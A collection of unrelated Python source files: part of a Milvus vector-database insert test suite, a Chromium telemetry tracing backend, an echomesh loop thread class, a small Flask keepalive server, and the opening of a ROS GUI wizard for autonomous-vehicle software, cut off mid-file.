def insert(thread_i):
log.info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable auto-flush
method: disable auto-flush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=ut.gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
ut.default_top_k, 1, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
log.debug(res)
assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
log.info("In callback check status")
assert not result
def check_result(self, result):
log.info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L1)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = ut.gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
"""
target: test insert with invalid field
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
field_value = get_field_int_value
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
"""
target: test insert with invalid entity
method: insert with invalid entity value
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
tracing_backend.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
from telemetry.core.timeline import trace_event_importer
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if len(d) == 0:
pass
elif len(d) == 1:
f.write(d[0])
else:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return trace_event_importer.Import(
f.getvalue())
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self, custom_categories=None):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
if custom_categories:
req['params'] = {'categories': custom_categories}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
|
Loop.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import threading
import time
from echomesh.element import Element
from echomesh.util import Log
LOGGER = Log.logger(__name__)
# TODO: these should be settings values.
DEFAULT_TIMEOUT = 1.0
class Loop(Element.Element):
def __init__(self, parent, description, interval=1, name='Element.Loop',
report_error_on_close=False, timeout=DEFAULT_TIMEOUT,
full_slave=True, pause_on_exception=True, max_error_count=2,
delay=0):
super(Loop, self).__init__(parent, description, full_slave=full_slave)
self.name = name or repr(self)
self.report_error_on_close = report_error_on_close
self.interval = interval
self.delay = 0
self.timeout = timeout
self.pause_on_exception = pause_on_exception
self.max_error_count = max_error_count
self.error_count = 0
self.time = 0
def next_time(self, t):
# TODO: is this right?
return t
def loop_target(self, t):
pass
def target(self):
while self.is_running:
try:
self.single_loop()
except:
self.error_count += 1
if self.is_running:
if self.error_count < self.max_error_count:
LOGGER.error('Thread %s reports an error:', self.name)
if self.pause_on_exception and self.is_running:
try:
self.pause()
except:
pass
elif self.report_error_on_close:
LOGGER.error(
'Thread %s reports an error on close:', self.name)
def run(self):
# Don't call super, because it starts things automatically
if not self.is_running:
self.is_running = True
self.first_time = True
self.start_time = time.time()
self.next_loop_time = self.next_time(time.time())
self.thread = threading.Thread(target=self.target)
self.thread.daemon = True
self.thread.start()
def single_loop(self):
if self.first_time:
self.first_time = False
if self.delay > 0:
time.sleep(self.delay)
self.time = time.time()
if self.time >= self.next_loop_time:
self.loop_target(self.time)
self.next_loop_time = self.next_time(self.next_loop_time)
if self.next_loop_time <= self.time:
self.next_loop_time = self.next_time(self.time)
if self.is_running:
sleep_time = min(self.timeout, self.next_loop_time - self.time)
if sleep_time > 0:
time.sleep(sleep_time)
else:
LOGGER.error(
'Sleeping for negative time %s', sleep_time, limit=10)
|
server_pings.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Ping"
def run():
app.run(host='0.0.0.0', port=8080)
def server_ping():
t = Thread(target=run)
t.start()
|
aslan_wizard.py
|
#! /usr/bin/env python
#
# Copyright 2020 Project Aslan
# Author: Efimia Panagiotaki <efimia@streetdrone.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import datetime
import sys
import fcntl
import threading
import Queue
import time
import shlex
import signal
import subprocess
import psutil
import yaml
import aslan_gui
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from types import MethodType
from aslan_msgs.msg import ConfigNDT
from aslan_msgs.msg import ConfigVelocitySet
from aslan_msgs.msg import ConfigNDTMapping
from aslan_msgs.msg import ConfigNDTMappingOutput
from aslan_msgs.msg import ConfigVoxelGridFilter
from aslan_msgs.msg import ConfigRayGroundFilter
from aslan_msgs.msg import ConfigWaypointLoader
from aslan_msgs.msg import ConfigWaypointFollower
from aslan_msgs.msg import ConfigLaneRule
from aslan_msgs.msg import ConfigLaneSelect
from aslan_msgs.msg import ConfigTwistFilter
from aslan_msgs.msg import ConfigLaneStop
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
class MyFrame(aslan_gui.MyFrame):
def __init__(self, *args, **kwds):
aslan_gui.MyFrame.__init__(self, *args, **kwds)
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.params = []
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que = Queue.Queue()
self.log_que_show = Queue.Queue()
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.all_th_infs = []
self.all_tabs = []
self.all_cmd_dics = []
self.config_dic = {}
self.sensing_cmd = {}
self.all_procs = []
# ros
#
rospy.init_node('aslan_wizard', anonymous=True)
# rospy.Subscriber('aslan_wizard', std_msgs.msg.String, self.ROSCb)
# self.pub = rospy.Publisher('', std_msgs.msg.String, queue_size=10)
self.bitmap_logo.Destroy()
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(src_dir()+ 'Aslan_Autonomy.png', wx.BITMAP_TYPE_ANY))
self.bitmap_1.Destroy()
self.bitmap_1 = wx.StaticBitmap(self.tab_simulation, wx.ID_ANY,
wx.Bitmap(src_dir() + 'imgs/sd.jpg', wx.BITMAP_TYPE_ANY))
self.bitmap_2.Destroy()
self.bitmap_2 = wx.StaticBitmap(self.tab_simulation, wx.ID_ANY,
wx.Bitmap(src_dir() + 'imgs/park.jpg', wx.BITMAP_TYPE_ANY))
# Configuration tab (Vehicle, Vehicle Info, Vehicle Model, Sensors tree, TF)
tab = self.tab_configuration
self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('vehicle.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
dic1 = self.load_yaml('cameras.yaml')
self.add_params(dic1.get('params', []))
self.create_checkboxes(dic1, self.panel_sensing1, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
dic2 = self.load_yaml('radar.yaml')
self.add_params(dic2.get('params', []))
self.create_checkboxes(dic2, self.panel_sensing2, None, self.drv_probe_cmd, self.sensing_cmd,
self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
self.dlg_rosbag_record = MyDialogROSbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
# Perception tab (Map, TF, Filters clicks, Localization NDT Tree)
tab = self.tab_perception
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('perception.yaml')
items = self.map_dic
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_pcd, 'pcd_file')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024 * 1024 * 1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = {'func': self.tc_point_cloud.GetValue}
hook_var = {'hook': hook1G, 'args': args, 'flags': ['every_time']}
obj = self.button_pcd
gdic_v = self.obj_to_gdic(obj, {}).get('pcd_file', {})
gdic_v['hook_var'] = hook_var
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.map_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# Planning tab (Waypoint maker (loader), lane planner (traffic_wp, lane_select), astar planner (obstacle avoid, vel set), wp follower (pp, twist f)
tab = self.tab_planning
self.all_tabs.append(tab)
self.planning_cmd = {}
self.all_cmd_dics.append(self.planning_cmd)
parent = self.tree_ctrl_5.GetParent()
self.obj_get('tree_ctrl_5').Destroy()
self.obj_get('tree_ctrl_6').Destroy()
self.obj_get('tree_ctrl_7').Destroy()
self.obj_get('tree_ctrl_8').Destroy()
items = self.load_yaml('planning.yaml')
self.add_params(items.get('params', []))
self.setup_buttons(items.get('buttons', {}), self.planning_cmd)
for i in range(4):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.planning_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i + 5), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# Controls tab ( vehicle interface , radio boxes, supervisor, disclaimer )
tab = self.tab_controls
self.all_tabs.append(tab)
self.controls_cmd = {}
self.all_cmd_dics.append(self.controls_cmd)
controls = self.load_yaml('controls.yaml')
self.add_params(controls.get('params', []))
self.setup_buttons(controls.get('buttons', {}), self.controls_cmd)
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(self.tab_tools, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
# Simulation tab
tab = self.tab_simulation
self.all_tabs.append(tab)
self.sim_cmd = {}
self.all_cmd_dics.append(self.sim_cmd)
sim = self.load_yaml('simulation.yaml')
self.add_params(sim.get('params', []))
self.setup_buttons(sim.get('buttons', {}), self.sim_cmd)
parent = self.tree_ctrl_joystick.GetParent()
self.obj_get('tree_ctrl_joystick').Destroy()
tree_ctrl1 = self.create_tree(parent, sim['subs'], None, None, self.sim_cmd)
tree_ctrl1.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_joystick', tree_ctrl1)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
# General
aslan_gui.MyFrame.__do_layout(self)
cond = lambda s: s.startswith('tab_')
